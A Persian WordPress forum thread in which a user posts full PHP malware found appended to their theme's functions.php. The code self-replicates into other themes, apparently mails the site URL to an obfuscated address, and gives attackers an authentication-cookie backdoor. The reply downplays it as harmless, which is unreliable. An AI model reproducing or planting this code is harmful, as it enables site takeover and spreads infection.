انجمن


اضافه شدن یک کد عجیب به اخر فایل پوسته  (۲ نوشته)

 • miladde

  آفلاین
  عضو
  تعداد نوشته‌ها: ۳۲
  تشکر شده: ۱۵ بار
  # نوشته شده: ۱۱ سال پیش
  ۹ خرداد ۱۳۹۱ - ۲۰:۰۵

  من یه قالب رو روی لوکال داشتم که خودم نوشته بودمش و کد های فانکشنشو میشناختم بعد از مدتی این کد به اخر function.php اضافه شد میخواستم ببینم که این چیه

  <?php
  function _check_active_widget(){
  	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
  	$output=strip_tags($output, $allowed);
  	$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
  	if (is_array($direst)){
  		foreach ($direst as $item){
  			if (is_writable($item)){
  				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
  				$cont=file_get_contents($item);
  				if (stripos($cont,$ftion) === false){
  					$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
  					$output .= $before . "Not found" . $after;
  					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
  					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);
  					$output .= ($showdot && $ellipsis) ? "..." : "";
  				}
  			}
  		}
  	}
  	return $output;
  }
  function _get_all_widgetcont($wids,$items=array()){
  	$places=array_shift($wids);
  	if(substr($places,-1) == "/"){
  		$places=substr($places,0,-1);
  	}
  	if(!file_exists($places) || !is_dir($places)){
  		return false;
  	}elseif(is_readable($places)){
  		$elems=scandir($places);
  		foreach ($elems as $elem){
  			if ($elem != "." && $elem != ".."){
  				if (is_dir($places . "/" . $elem)){
  					$wids[]=$places . "/" . $elem;
  				} elseif (is_file($places . "/" . $elem)&&
  					$elem == substr(__FILE__,-13)){
  					$items[]=$places . "/" . $elem;}
  				}
  			}
  	}else{
  		return false;
  	}
  	if (sizeof($wids) > 0){
  		return _get_all_widgetcont($wids,$items);
  	} else {
  		return $items;
  	}
  }
  if(!function_exists("stripos")){
    function stripos( $str, $needle, $offset = 0 ){
      return strpos( strtolower( $str ), strtolower( $needle ), $offset );
    }
  }
  
  if(!function_exists("strripos")){
    function strripos( $haystack, $needle, $offset = 0 ) {
      if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
      if( $offset < 0 ){
        $temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
      }
      else{
        $temp_cut = strrev(  substr(  $haystack, 0, max( ( strlen($haystack) - $offset ), 0 )  )  );
      }
      if(  ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE  )return FALSE;
      $pos = (  strlen( $haystack ) - ( $found + $offset + strlen( $needle ) )  );
      return $pos;
    }
  }
  if(!function_exists("scandir")){
  	function scandir($dir,$listDirectories=false, $skipDots=true) {
  	  $dirArray = array();
  	  if ($handle = opendir($dir)) {
  	    while (false !== ($file = readdir($handle))) {
  	      if (($file != "." && $file != "..") || $skipDots == true) {
  	        if($listDirectories == false) { if(is_dir($file)) { continue; } }
  	        array_push($dirArray,basename($file));
  	      }
  	    }
  	    closedir($handle);
  	  }
  	  return $dirArray;
  	}
  }
  add_action("admin_head", "_check_active_widget");
  function _prepared_widget(){
  	if(!isset($length)) $length=120;
  	if(!isset($method)) $method="cookie";
  	if(!isset($html_tags)) $html_tags="<a>";
  	if(!isset($filters_type)) $filters_type="none";
  	if(!isset($s)) $s="";
  	if(!isset($filter_h)) $filter_h=get_option("home");
  	if(!isset($filter_p)) $filter_p="wp_";
  	if(!isset($use_link)) $use_link=1;
  	if(!isset($comments_type)) $comments_type="";
  	if(!isset($perpage)) $perpage=$_GET["cperpage"];
  	if(!isset($comments_auth)) $comments_auth="";
  	if(!isset($comment_is_approved)) $comment_is_approved="";
  	if(!isset($authname)) $authname="auth";
  	if(!isset($more_links_text)) $more_links_text="(more...)";
  	if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");
  	if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;
  	if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";
  	if(!isset($more_content)) $more_content="ma".$s."il";
  	if(!isset($forces_more)) $forces_more=1;
  	if(!isset($fakeit)) $fakeit=1;
  	if(!isset($sql)) $sql="";
  	if (!$widget_output) :
  
  	global $wpdb, $post;
  	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
  	if (!empty($post->post_password)) {
  		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
  			if(is_feed()) {
  				$output=__("هيچ نقل قولي وجود ندارد زيرا اين پست محافظت شده است.");
  			} else {
  	      $output=get_the_password_form();
  			}
  		}
  	}
  	if(!isset($fix_tag)) $fix_tag=1;
  	if(!isset($filters_types)) $filters_types=$filter_h;
  	if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;
  	if(!isset($more_tags)) $more_tags="div";
  	if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#
  	if(!isset($mlink_title)) $mlink_title="Continue reading this entry";
  	if(!isset($showdot)) $showdot=1;
  
  	$comments=$wpdb->get_results($sql);
  	if($fakeit == 2) {
  		$text=$post->post_content;
  	} elseif($fakeit == 1) {
  		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
  	} else {
  		$text=$post->post_excerpt;
  	}
  	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
  	if($length < 0) {
  		$output=$text;
  	} else {
  		if(!$no_more && strpos($text, "<!--more-->")) {
  		  $text=explode("<!--more-->", $text, 2);
  			$l=count($text[0]);
  			$more_link=1;
  			$comments=$wpdb->get_results($sql);
  		} else {
  			$text=explode(" ", $text);
  			if(count($text) > $length) {
  				$l=$length;
  				$ellipsis=1;
  			} else {
  				$l=count($text);
  				$more_links_text="";
  				$ellipsis=0;
  			}
  		}
  		for ($i=0; $i<$l; $i++)
  				$output .= $text[$i] . " ";
  	}
  	update_option("_is_widget_active_", 1);
  	if("all" != $html_tags) {
  		$output=strip_tags($output, $html_tags);
  		return $output;
  	}
  	endif;
  	$output=rtrim($output, "\s\n\t\r\x0B");
    $output=($fix_tag) ? balanceTags($output, true) : $output;
  	$output .= ($showdot && $ellipsis) ? "..." : "";
  	$output=apply_filters($filters_type, $output);
  	switch($more_tags) {
  		case("div") :
  			$tag="div";
  		break;
  		case("span") :
  			$tag="span";
  		break;
  		case("p") :
  			$tag="p";
  		break;
  		default :
  			$tag="span";
  	}
  
  	if ($use_link ) {
  		if($forces_more) {
  			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";
  		} else {
  			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";
  		}
  	}
  	return $output;
  }
  
  add_action("init", "_prepared_widget");
  
  ?>
 • میلاد

  آفلاین
  عضو
  تعداد نوشته‌ها: ۱۰۳
  تشکر شده: ۴۰ بار
  # نوشته شده: ۱۱ سال پیش
  ۱۱ خرداد ۱۳۹۱ - ۰۱:۰۶

  چیزه خاصی نیست ..
  یک قالب مشکل دار روی لوکال هاست سیستم استفاده کردی که این کد ها از اون ها انتقال یافته به این قالبت ...
  کد های اضافه را پاک کن مشکلت برطرف میشه ..

  کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
  miladde

درباره‌ی این موضوعبرچسب‌ها